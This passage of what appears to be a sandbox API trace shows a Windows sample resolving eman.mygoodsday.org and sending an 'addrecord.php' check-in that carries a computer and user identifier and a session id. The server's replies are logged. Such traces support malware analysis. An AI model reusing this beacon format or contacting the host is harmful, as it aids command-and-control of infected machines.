cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:04:35 GMT") returned 18 [0078.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-LENGTH: 12", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0078.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-LENGTH: 12", cchWideChar=18, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTENT-LENGTH: 12", lpUsedDefaultChar=0x0) returned 18 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:04:35 GMT") returned 18 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/HTML03:04:35 GMT") returned 18 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:04:35 GMT") returned 18 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:04:35 GMT") returned 18 [0078.856] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONTENT-LENGTH: 12/HTML03:04:35 GMT") returned 18 [0078.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Connection: keep-alive", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0078.856] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Connection: keep-alive", cchWideChar=22, lpMultiByteStr=0x1fde38c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Connection: keep-alive", lpUsedDefaultChar=0x0) returned 22 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-aliveL03:04:35 GMT") returned 22 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-aliveL03:04:35 GMT") returned 22 [0078.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONNECTION: KEEP-ALIVE", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0078.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONNECTION: KEEP-ALIVE", cchWideChar=22, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONNECTION: KEEP-ALIVE", lpUsedDefaultChar=0x0) returned 22 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:35 GMT") returned 22 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:35 GMT") returned 22 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:35 GMT") returned 22 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:35 GMT") returned 22 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="CONNECTION: KEEP-ALIVEL03:04:35 GMT") returned 22 [0078.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-Powered-By: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0078.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-Powered-By: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x1fde38c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X-Powered-By: PHP/5.4.16", lpUsedDefaultChar=0x0) returned 24 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:04:35 GMT") returned 24 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde38c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:04:35 GMT") returned 24 [0078.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-POWERED-BY: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0078.857] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="X-POWERED-BY: PHP/5.4.16", cchWideChar=24, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="X-POWERED-BY: PHP/5.4.16", lpUsedDefaultChar=0x0) returned 24 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:04:35 GMT") returned 24 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:04:35 GMT") returned 24 [0078.857] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:04:35 GMT") returned 24 [0078.858] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde3ec, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-POWERED-BY: PHP/5.4.163:04:35 GMT") returned 24 [0078.858] GetCurrentThreadId () returned 0xb68 [0078.858] GetCurrentThreadId () returned 0xb68 [0078.858] GetCurrentThreadId () returned 0xb68 [0078.858] QueryPerformanceFrequency (in: lpFrequency=0x248fca4 | out: lpFrequency=0x248fca4) returned 1 [0078.858] QueryPerformanceCounter (in: lpPerformanceCount=0x248fc9c | out: lpPerformanceCount=0x248fc9c*=12632041357) returned 1 [0078.858] shutdown (s=0x280, how=1) returned 0 [0078.859] Sleep (dwMilliseconds=0x1) [0078.870] ioctlsocket (in: s=0x280, cmd=1074030207, argp=0x248fce8 | out: argp=0x248fce8) returned 0 [0078.870] closesocket (s=0x280) returned 0 [0078.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fba0b0, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0078.870] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fba0b0, cbMultiByte=12, lpWideCharStr=0x1fcf51c, cchWideChar=12 | out: lpWideCharStr="ADDRECORD OK") returned 12 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] SetEvent (hEvent=0x1dc) returned 1 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] GetCurrentThreadId () returned 0xb68 [0078.871] CloseHandle (hObject=0x204) returned 1 [0078.871] RtlExitUserThread (Status=0x0) Thread: id = 85 os_tid = 0xdb0 [0090.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0090.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x1fc880c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eman.mygoodsday.org", lpUsedDefaultChar=0x0) returned 19 [0090.744] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x0, lpMultiByteStr=0x2001c3c, cbMultiByte=25, lpWideCharStr=0x248ed30, cchWideChar=2047 | out: lpWideCharStr="Host: eman.mygoodsday.org") returned 25 [0090.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0090.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="80", cchWideChar=2, lpMultiByteStr=0x1fba66c, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="80", lpUsedDefaultChar=0x0) returned 2 [0090.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0090.744] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="eman.mygoodsday.org", cchWideChar=19, lpMultiByteStr=0x1fc867c, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eman.mygoodsday.org", lpUsedDefaultChar=0x0) returned 19 [0090.744] getaddrinfo (in: pNodeName="eman.mygoodsday.org", pServiceName="80", pHints=0x248fb84*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x248fba4 | out: ppResult=0x248fba4*=0x2c1ab0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2bcaf8*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), ai_next=0x0)) returned 0 [0090.826] FreeAddrInfoW (pAddrInfo=0x2c1ab0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2bcaf8*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), ai_next=0x0)) [0090.826] getnameinfo (in: pSockaddr=0x248fc0c*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), SockaddrLength=0x10, pNodeBuffer=0x1f105ec, NodeBufferSize=0x401, pServiceBuffer=0x1fe53c4, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="104.218.120.192", pServiceBuffer="80") returned 0 [0090.826] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb308c, cbMultiByte=15, lpWideCharStr=0x248ec28, cchWideChar=2047 | out: lpWideCharStr="104.218.120.192") returned 15 [0090.826] htons (hostshort=0x5000) returned 0x50 [0090.826] socket (af=2, type=1, protocol=6) returned 0x2a8 [0090.826] connect (s=0x2a8, name=0x248fcd0*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), namelen=16) returned 0 [0090.851] getsockname (in: s=0x2a8, name=0x1f5f500, namelen=0x248fc9c | out: name=0x1f5f500*(sa_family=2, sin_port=0xc161, sin_addr="192.168.0.96"), namelen=0x248fc9c) returned 0 [0090.851] getpeername (in: s=0x2a8, name=0x1f5f51c, namelen=0x248fc9c | out: name=0x1f5f51c*(sa_family=2, sin_port=0x50, sin_addr="104.218.120.192"), namelen=0x248fc9c) returned 0 [0090.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", cchWideChar=245, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 245 [0090.851] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", cchWideChar=245, lpMultiByteStr=0x1f1cd2c, cbMultiByte=245, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GET /addrecord.php?apikey=eman_api_key&compuser=LHNIWSJ|CIiHmnxMn6Ps&sid=19kSvLoQsaClDN7y&phase=[ALL]460F9943EA70F103 HTTP/1.0\r\nHost: eman.mygoodsday.org\r\nKeep-Alive: 300\r\nConnection: keep-alive\r\nUser-Agent: Mozilla/4.0 (compatible; Synapse)\r\n\r\n", lpUsedDefaultChar=0x0) returned 245 [0090.851] send (in: s=0x2a8, buf=0x1f1cd2c*, len=245, flags=0 | out: buf=0x1f1cd2c*) returned 245 [0090.851] QueryPerformanceFrequency (in: lpFrequency=0x248fcc4 | out: lpFrequency=0x248fcc4) returned 1 [0090.851] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcbc | out: lpPerformanceCount=0x248fcbc*=13831379581) returned 1 [0090.851] Sleep (dwMilliseconds=0x0) [0090.854] ioctlsocket (in: s=0x2a8, cmd=1074030207, argp=0x248fc9c | out: argp=0x248fc9c) returned 0 [0090.854] select (in: nfds=681, readfds=0x248fb90, writefds=0x0, exceptfds=0x0, timeout=0x248fb88 | out: readfds=0x248fb90, writefds=0x0, exceptfds=0x0) returned 1 [0091.023] ioctlsocket (in: s=0x2a8, cmd=1074030207, argp=0x248fc9c | out: argp=0x248fc9c) returned 0 [0091.023] recv (in: s=0x2a8, buf=0x1f105ec, len=178, flags=0 | out: buf=0x1f105ec*) returned 178 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb310c, cbMultiByte=15, lpWideCharStr=0x248ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OKodsday.org") returned 15 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb310c, cbMultiByte=15, lpWideCharStr=0x248ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OKodsday.org") returned 15 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb310c, cbMultiByte=15, lpWideCharStr=0x248ed30, cchWideChar=2047 | out: lpWideCharStr="HTTP/1.1 200 OKodsday.org") returned 15 [0091.023] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0091.023] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=13848564994) returned 1 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb310c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx1 200 OKodsday.org") returned 13 [0091.023] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0091.023] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=13848574671) returned 1 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fe54dc, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:47 GMT") returned 35 [0091.023] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0091.023] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=13848583582) returned 1 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8a14, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:04:47 GMT") returned 23 [0091.023] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0091.023] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=13848592283) returned 1 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8a14, cbMultiByte=18, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Length: 12/html03:04:47 GMT") returned 18 [0091.023] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0091.023] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=13848600797) returned 1 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fc8a14, cbMultiByte=22, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Connection: keep-alivel03:04:47 GMT") returned 22 [0091.023] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0091.023] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=13848609308) returned 1 [0091.023] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fcfd2c, cbMultiByte=24, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="X-Powered-By: PHP/5.4.163:04:47 GMT") returned 24 [0091.024] QueryPerformanceFrequency (in: lpFrequency=0x248fcb8 | out: lpFrequency=0x248fcb8) returned 1 [0091.024] QueryPerformanceCounter (in: lpPerformanceCount=0x248fcb0 | out: lpPerformanceCount=0x248fcb0*=13848617739) returned 1 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Server: nginx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Server: nginx", cchWideChar=13, lpMultiByteStr=0x1fb308c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Server: nginx", lpUsedDefaultChar=0x0) returned 13 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb308c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx PHP/5.4.163:04:47 GMT") returned 13 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb308c, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Server: nginx PHP/5.4.163:04:47 GMT") returned 13 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SERVER: NGINX", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="SERVER: NGINX", cchWideChar=13, lpMultiByteStr=0x1fb30ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SERVER: NGINX", lpUsedDefaultChar=0x0) returned 13 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb30ac, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:04:47 GMT") returned 13 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb30ac, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:04:47 GMT") returned 13 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb30ac, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:04:47 GMT") returned 13 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fb30ac, cbMultiByte=13, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="SERVER: NGINX PHP/5.4.163:04:47 GMT") returned 13 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:47 GMT", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:47 GMT", cchWideChar=35, lpMultiByteStr=0x1fde50c, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Date: Wed, 03 Oct 2018 03:04:47 GMT", lpUsedDefaultChar=0x0) returned 35 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:47 GMT") returned 35 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Date: Wed, 03 Oct 2018 03:04:47 GMT") returned 35 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:47 GMT", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:47 GMT", cchWideChar=35, lpMultiByteStr=0x1fde56c, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DATE: WED, 03 OCT 2018 03:04:47 GMT", lpUsedDefaultChar=0x0) returned 35 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:47 GMT") returned 35 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:47 GMT") returned 35 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:47 GMT") returned 35 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=35, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="DATE: WED, 03 OCT 2018 03:04:47 GMT") returned 35 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Type: text/html", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="Content-Type: text/html", cchWideChar=23, lpMultiByteStr=0x1fde50c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Content-Type: text/html", lpUsedDefaultChar=0x0) returned 23 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:04:47 GMT") returned 23 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde50c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 | out: lpWideCharStr="Content-Type: text/html03:04:47 GMT") returned 23 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-TYPE: TEXT/HTML", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0091.024] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="CONTENT-TYPE: TEXT/HTML", cchWideChar=23, lpMultiByteStr=0x1fde56c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTENT-TYPE: TEXT/HTML", lpUsedDefaultChar=0x0) returned 23 [0091.024] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1fde56c, cbMultiByte=23, lpWideCharStr=0x248ed24, cchWideChar=2047 